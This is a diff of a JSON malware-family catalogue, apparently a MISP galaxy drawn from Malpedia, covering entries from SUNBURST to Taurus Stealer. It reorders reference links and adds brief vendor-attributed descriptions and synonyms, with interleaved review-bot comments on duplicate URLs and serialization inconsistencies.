+ "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/",
+ "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
+ "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
+ "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
+ "https://www.youtube.com/watch?v=cMauHTV-lJg",
+ "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
+ "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a",
+ "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident",
+ "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection",
+ "https://www.youtube.com/watch?v=-Vsgmw2G4Wo",
+ "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
+ "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
+ "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/"
 ],
 "synonyms": [
 "Solorigate"
@@ -46082,33 +48246,33 @@
 "value": "SUNBURST"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Suncrypt ransomware prevents victims from accessing files by encryption. It also renames all encrypted files and creates a ransom message. It renames encrypted files by appending a string of random characters as the new extension.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
 "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc",
+ "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
 "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022",
+ "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/",
 "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
 "https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
- "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
- "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022"
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/"
 ],
 "synonyms": [],
 "type": []
@@ -46121,8 +48285,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal",
- "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/",
+ "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html"
 ],
 "synonyms": [],
 "type": []
@@ -46135,8 +48299,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunseed",
- "https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails",
- "https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware"
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware",
+ "https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails"
 ],
 "synonyms": [],
 "type": []
@@ -46146,32 +48310,45 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.superbear",
+ "https://0x0v1.com/posts/superbear/superbear/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a6ca0a04-359d-4f7a-b556-46b33ec75473",
+ "value": "SuperBear RAT"
+ },
+ {
+ "description": "According to CISA, SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova",
 "https://www.youtube.com/watch?v=7WX5fCEzTlA",
- "https://twitter.com/MalwareRE/status/1342888881373503488",
 "https://github.com/fireeye/sunburst_countermeasures/pull/5",
- "https://www.solarwinds.com/securityadvisory/faq",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
- "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/",
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
- "https://unit42.paloaltonetworks.com/solarstorm-supernova",
- "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html",
- "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
- "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
- "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan",
+ "https://github.com/fireeye/sunburst_countermeasures",
+ "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
+ "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group",
+ "https://twitter.com/MalwareRE/status/1342888881373503488",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
+ "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html",
 "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://www.anquanke.com/post/id/226029",
- "https://www.solarwinds.com/securityadvisory"
+ "https://www.solarwinds.com/securityadvisory/faq",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
+ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://www.solarwinds.com/securityadvisory",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
+ "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
+ "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan",
+ "https://unit42.paloaltonetworks.com/solarstorm-supernova",
+ "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis",
+ "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/",
+ "https://www.anquanke.com/post/id/226029"
 ],
 "synonyms": [],
 "type": []
@@ -46184,11 +48361,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox",
- "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1",
 "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim",
+ "https://blog.avast.com/2013/06/18/your-facebook-connection-is-now-secured/",
 "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us",
+ "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
 "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
- "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf"
+ "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1"
 ],
 "synonyms": [
 "Bayrob",
@@ -46200,7 +48378,7 @@
 "value": "SuppoBox"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Surtr is ransomware. Malware of this type encrypts files (and renames them) and generates a ransom note. Surtr appends the decryptmydata@mailfence.com email address and the \".SURT\" extension to filenames.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr",
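Review bot: The new SUPERNOVA description in the `@@ -46146,32 +48310,45 @@` hunk ends with a trailing space inside the string (`credentials. ",`), which none of the other descriptions added in this file carry; it should read `credentials.",`. The same entry's rewritten ref list keeps both `https://unit42.paloaltonetworks.com/solarstorm-supernova` and `.../solarstorm-supernova/`, and both the `labs.sentinelone.com/...` and `www.sentinelone.com/labs/...` forms of one article, so single sources are listed twice; the SystemBC hunk at `@@ -46470,32 +48648,46 @@` has the same trailing-slash pair for the Microsoft ransomware-as-a-service post. If these lists are regenerated from Malpedia, the normalisation belongs in the import step rather than in hand edits to this file. The new SuperBear RAT entry is added with `"description": ""` while its neighbours gain text; a one-sentence summary would keep the entries consistent.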
@@ -46213,7 +48391,7 @@
 "value": "surtr"
 },
 {
- "description": "",
+ "description": "According to PCrisk, SVCReady collects information about the infected system such as username, computer name, time zone, computer manufacturer, BIOS, and firmware. Also, it gathers lists of running processes and installed software. SVCReady sends collected data to the C2 server. Additionally, SVCReady attempts to maintain its foothold on the system by creating a scheduled task.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready",
@@ -46240,13 +48418,13 @@
 "value": "swen"
 },
 {
- "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.",
+ "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim\u2019s Active Directory environment.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer",
 "https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/",
- "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
- "https://twitter.com/ESETresearch/status/1618960022150729728"
+ "https://twitter.com/ESETresearch/status/1618960022150729728",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf"
 ],
 "synonyms": [
 "JaguarBlade"
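Review bot: The SwiftSlicer description change in the `@@ -46240,13 +48418,13 @@` hunk only re-encodes the apostrophe in `victim’s` as `victim\u2019s`; both spell the same JSON string, so this is a serializer setting (ASCII-escaping of non-ASCII) rather than a content edit. If the generator now escapes non-ASCII, that is fine, but it should be applied the same way across the whole file, otherwise this line will keep flipping between the two forms on each regeneration and produce diff noise that hides real description changes.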
@@ -46274,13 +48452,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot",
- "https://www.symantec.com/connect/blogs/sykipot-attacks",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-edison",
- "https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
 "https://community.rsa.com/thread/185437",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
+ "https://www.secureworks.com/research/threat-profiles/bronze-edison",
+ "https://www.symantec.com/connect/blogs/sykipot-attacks"
 ],
 "synonyms": [
 "Wkysol",
@@ -46296,8 +48474,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack",
- "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/",
- "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/"
+ "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/",
+ "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
 ],
 "synonyms": [],
 "type": []
@@ -46348,9 +48526,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -46364,8 +48542,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/",
- "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
- "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -46407,12 +48585,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit",
- "https://twitter.com/QW5kcmV3/status/1176861114535165952",
- "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
- "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
- "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
+ "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
 "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain",
- "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html"
+ "https://twitter.com/QW5kcmV3/status/1176861114535165952",
+ "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
+ "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
+ "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897"
 ],
 "synonyms": [
 "IvizTech",
@@ -46444,8 +48622,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysrv_hello",
- "https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/",
- "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet"
+ "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet",
+ "https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"
 ],
 "synonyms": [],
 "type": []
@@ -46470,32 +48648,46 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc",
- "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
- "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://news.sophos.com/en-us/2020/12/16/systembc/",
- "https://community.riskiq.com/article/47766fbd",
- "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
 "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
- "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
- "https://asec.ahnlab.com/en/33600/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader",
+ "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes",
 "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a"
+ "https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
+ "https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/",
+ "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://docs.velociraptor.app/exchange/artifacts/pages/systembc/",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://cyber.wtf/2023/02/09/defeating-vmprotects-latest-tricks/",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.reliaquest.com/blog/gootloader-infection-credential-access/",
+ "https://news.sophos.com/en-us/2020/12/16/systembc/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy",
+ "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://securelist.com/focus-on-droxidat-systembc/110302/",
+ "https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor"
 ],
 "synonyms": [
- "Coroxy"
+ "Coroxy",
+ "DroxiDat"
 ],
 "type": []
 },
@@ -46507,10 +48699,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi",
- "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel",
 "https://www.secureworks.com/research/srizbi",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
 "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
+ "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel"
 ],
 "synonyms": [],
 "type": []
@@ -46536,16 +48728,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat",
 "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
 "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
- "https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
 "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html",
+ "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
 "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
- "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a"
 ],
 "synonyms": [
 "simbot"
@@ -46612,13 +48804,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany",
- "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/",
- "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/",
 "https://securityaffairs.co/wordpress/127761/malware/targetcompany-ransomware-decryptor.html",
+ "https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/",
+ "https://unit42.paloaltonetworks.com/mallox-ransomware/",
+ "https://asec.ahnlab.com/en/39152/",
+ "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-targetcompany-ransomware-victims/",
 "https://www.sangfor.com/blog/cybersecurity/new-threat-mallox-ransomware",
- "https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html",
+ "https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/",
 "https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/",
- "https://asec.ahnlab.com/en/39152/"
+ "https://id-ransomware.blogspot.com/2021/06/tohnichi-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/23/f/xollam-the-latest-face-of-targetcompany.html"
 ],
 "synonyms": [
 "Fargo",
@@ -46648,13 +48843,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer",
- "https://blog.minerva-labs.com/taurus-stealers-evolution",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/agentvx-and-taurus/",
- "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/",
 "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
